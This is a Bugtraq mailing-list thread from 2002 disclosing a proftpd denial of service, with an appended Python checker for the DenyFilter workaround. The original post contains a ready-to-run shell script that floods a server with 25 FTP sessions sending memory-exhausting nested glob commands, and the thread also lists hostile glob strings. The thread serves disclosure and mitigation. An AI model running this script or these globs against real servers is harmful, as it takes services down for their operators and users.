Bugtraq mailing list archives

Re: [VulnWatch] proftpd <=1.2.7rc3 DoS


From: Rob klein Gunnewiek <rmkleing () hio hen nl>
Date: Wed, 11 Dec 2002 01:15:01 +0100 (MET)

Hello,

1. I know that the workaround with the DenyFilter works.
2. Proftpd by default doesn't have this filter set, neither has the
   default proftpd install on slackware 8.1
3. The methods mentioned on the page you refer to do not work on later
   proftpd versions (tested on 1.2.7rc3) because of limits set in the
   code. i.e:

ftp> ls .*./*?/.*./*?/.*./*?/.*./*?/.*./
200 PORT command successful
150 Opening ASCII mode data connection for file list
226-Out of memory during globbing of .*./*?/.*./*?/.*./*?/.*./*?/.*./
226 Transfer complete.
ftp>

  these proftpd versions don't even process that command.

I think I have done proper research on this issue before notifying anyone.

People should do more research before making any conclusions, it's far
less embarrassing.

Rob.

On Tue, 10 Dec 2002, Kurt Seifried wrote:

This is so old I can't even find any postings/articles I remember making on
it. Here is one link from early last year:

http://lwn.net/2001/0322/a/proftpd-dos.php3

Check the documentation:

DenyFilter \*.*/

Problem solved.

People should search Google before posting, it's far less embarrassing.

Kurt Seifried, kurt () seifried org
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/

----- Original Message -----
From: "Rob klein Gunnewiek" <rmkleing () hio hen nl>
To: <bugtraq () securityfocus com>; <vulnwatch () vulnwatch org>
Sent: Sunday, December 08, 2002 4:53 AM
Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS


Hello,

proftpd is vulnerable to denial of service similar to the list
*/../*/../*/../*.

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and a lot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach  -  www.duho.org
#
# use: ./prodos.sh <host> <user> <pass>
# do this some more to make sure the system eventually dies

if [ $# -ne 3 ] ; then
    echo "use: $0 <host> <user> <pass>" >&2
    exit 1
fi

# Start 25 FTP sessions in the background so their globs overlap; each
# session logs in and sends one STAT with a deeply nested glob that the
# server expands on its side.
cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF &
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
cnt=$((cnt-1))
done
# Give the server a moment to start working on the globs, then drop the
# client processes; rerun the script to pile on more.
sleep 2
killall -9 ftp
echo DONE!

#end
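
The thread's workaround is the DenyFilter line Kurt quotes, `DenyFilter \*.*/`, which proftpd applies as a regular expression to command arguments. The following is an added example, not code from either poster or from the proftpd project: it applies that same regex in Python so you can see which arguments it does and does not catch (a literal `*` followed somewhere later by `/`, so `ls *.txt` still works while `stat /*/*/*/*/*/*/*` and `ls .*./*?/...` are refused), and it sends a single STAT with the glob from the script to a server and buckets the reply, so you can confirm the filter is active without the 25 parallel sessions the DoS script uses. The sample reply strings in the test are constructed for illustration; the exact wording proftpd uses for a filtered argument is not quoted in the thread.

```python
"""
Added example (not from the thread): check which FTP command arguments
the proftpd `DenyFilter \*.*/` regex rejects, and probe a server with a
single globbing STAT to see whether the filter is in effect.
"""
import ftplib
import socket
import sys

# DenyFilter value from the thread. Backslash-star is a literal '*',
# '.*' is anything, '/' is a literal slash: any argument with a star
# followed (anywhere later) by a slash is refused before expansion.
import re
DENY_FILTER = re.compile(r"\*.*/")

# The glob the DoS script sends via "quote stat".
GLOB_PATTERN = "/*/*/*/*/*/*/*"


def deny_filter_blocks(arg: str) -> bool:
    """True if `DenyFilter \\*.*/` would reject this command argument."""
    return DENY_FILTER.search(arg) is not None


def classify_reply(reply: str) -> str:
    """Bucket the server's reply to a STAT/LIST with a glob argument.

    'rejected'     -> 4xx/5xx: the argument was refused before expansion,
                      which is what DenyFilter produces
    'glob-limited' -> the server answered 2xx but reports hitting its
                      globbing limit (the "Out of memory during globbing"
                      behaviour Rob saw on 1.2.7rc3)
    'accepted'     -> the server expanded the glob
    """
    code = reply[:3]
    if code[:1] in ("4", "5"):
        return "rejected"
    if "globbing" in reply.lower():
        return "glob-limited"
    return "accepted"


def probe_stat_glob(host, user, password, pattern=GLOB_PATTERN, timeout=15):
    """Log in, send ONE 'STAT <pattern>' and classify the reply.

    This is a single request, not the 25 parallel sessions of the DoS
    script, but on an unfiltered server it still makes the daemon expand
    the glob, so only run it against a host you are responsible for.
    A timeout is reported as such: a server that never answers is most
    likely still globbing.
    """
    with ftplib.FTP(host, user, password, timeout=timeout) as ftp:
        try:
            reply = ftp.sendcmd("STAT " + pattern)
        except (ftplib.error_perm, ftplib.error_temp) as e:
            reply = str(e)          # ftplib raises on 4xx/5xx; keep the text
        except socket.timeout:
            return "timeout"
        return classify_reply(reply)


if __name__ == "__main__":
    # Offline part: show what the filter catches.
    for arg in (GLOB_PATTERN, "*/../*/../*/../*",
                ".*./*?/.*./*?/.*./*?/.*./*?/.*./", "*.txt", "pub/"):
        print("%-40s %s" % (arg, "blocked" if deny_filter_blocks(arg)
                                  else "allowed"))
    # Online part, optional: ./check.py <host> <user> <pass>
    if len(sys.argv) == 4:
        print(probe_stat_glob(sys.argv[1], sys.argv[2], sys.argv[3]))
```

Note the caveat the offline part makes visible: `\*.*/` only matches a star that has a slash somewhere after it, so a glob confined to a single directory component (`*.txt`, `*`) is still expanded; that is deliberate in the documented workaround, since it keeps ordinary `ls *.txt` working while stopping the cross-directory patterns in the thread.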
